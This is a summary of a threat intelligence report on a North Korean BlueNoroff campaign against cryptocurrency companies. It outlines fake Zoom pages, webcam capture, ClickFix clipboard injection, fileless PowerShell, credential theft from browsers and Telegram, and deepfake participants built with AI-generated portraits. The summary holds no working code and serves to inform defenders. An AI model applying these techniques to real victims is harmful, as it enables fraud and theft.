Arctic Wolf Labs has published a detailed technical analysis of a BlueNoroff (Lazarus Group/DPRK) campaign targeting Web3 and cryptocurrency companies. The attack chain begins with spear-phishing via a manipulated Calendly invite containing a typo-squatted Zoom link. Victims are directed to a self-contained JavaScript fake meeting page that silently exfiltrates their webcam feed via getUserMedia, then delivers a ClickFix clipboard injection attack. A multi-stage fileless PowerShell execution chain achieves full system compromise in under five minutes. Post-exploitation modules steal Telegram sessions, enumerate installed software, harvest Chromium browser credentials (bypassing Chrome 127+ app-bound encryption), and inject AES-encrypted shellcode into browser processes. The attacker maintains a deepfake production pipeline combining stolen victim webcam footage with GPT-4o-generated AI portraits and Adobe Premiere Pro compositing to fabricate convincing fake meeting participants. Over 100 victims across 20+ countries were identified, with 80% in crypto/blockchain sectors and 45% being CEOs or founders. Operator timestamps align with DPRK business hours, supporting state-sponsored attribution.
Table of contents
Executive SummaryTechnical AnalysisWeaponizationTargetsAttributionRemediationConclusionsAPPENDIXSort: